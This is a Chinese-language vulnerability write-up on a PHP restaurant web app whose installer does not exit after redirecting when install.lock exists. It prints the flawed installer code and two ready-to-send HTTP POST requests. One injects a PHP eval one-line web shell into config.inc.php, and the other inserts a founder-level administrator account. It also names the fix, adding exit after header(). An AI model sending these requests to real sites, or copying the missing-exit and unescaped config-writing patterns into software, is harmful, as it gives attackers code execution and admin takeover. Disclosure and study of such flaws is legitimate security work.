问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。
<?php
if(file_exists("../install.lock"))
{
    header("Location: ../");//没有退出
}
//echo 'tst';exit;
require_once("init.php");
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
可见在 install.lock 已经存在时,只是用 header() 做了 302 重定向并没有 exit,也就是说下面的安装逻辑还是会继续执行——只要客户端不跟随跳转即可。修复方式是在 header() 之后立即 exit;。在这里至少可以产生两个漏洞。

1、getshell(很危险)
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
    $smarty->assign("step",1);
    $smarty->display("index.html");
}elseif($_REQUEST['step']==2)
{
    $mysql_host=trim($_POST['mysql_host']);
    $mysql_user=trim($_POST['mysql_user']);
    $mysql_pwd=trim($_POST['mysql_pwd']);
    $mysql_db=trim($_POST['mysql_db']);
    $tblpre=trim($_POST['tblpre']);
    $domain==trim($_POST['domain']);
    $str="<?php \r\n";
    $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
    $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
    $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
    $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
    $str.='define("MYSQL_CHARSET","GBK");'."\r\n";
    $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
    $str.='define("DOMAIN","'.$domain.'");'."\r\n";
    $str.='define("SKINS","default");'."\r\n";
    $str.='?>';
    file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
上面的代码把 POST 的数据未经任何过滤或转义就拼接进 PHP 源码并写入了 ../config/config.inc.php 文件,那么我们提交如下 POST 包,即可获得一句话木马:
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.129/canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 126

mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
但是这个方法很危险,它会覆盖 config.inc.php 里原有的数据库配置,将导致网站无法运行。

2、直接添加管理员

elseif($_REQUEST['step']==5)
{
    if($_POST)
    { require_once("../config/config.inc.php");
        $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
        mysql_select_db(MYSQL_DB,$link);
        mysql_query("SET NAMES ".MYSQL_CHARSET );
        mysql_query("SET sql_mode=''");

        $adminname=trim($_POST['adminname']);
        $pwd1=trim($_POST['pwd1']);
        $pwd2=trim($_POST['pwd2']);
        if(empty($adminname))
        {

            echo "<script>alert('管理员不能为空');history.go(-1);</script>";
            exit();
        }
        if(($pwd1!=$pwd2) or empty($pwd1))
        {
            echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出
        }
        mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员
    }
这样的话,即使 install.lock 已经存在,我们也可以直接插入一个 qingshen/qingshen 的管理员帐号,请求如下:
POST /canting/install/index.php?m=index&step=5 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.2cto.com /canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

adminname=qingshen&pwd1=qingshen&pwd2=qingshen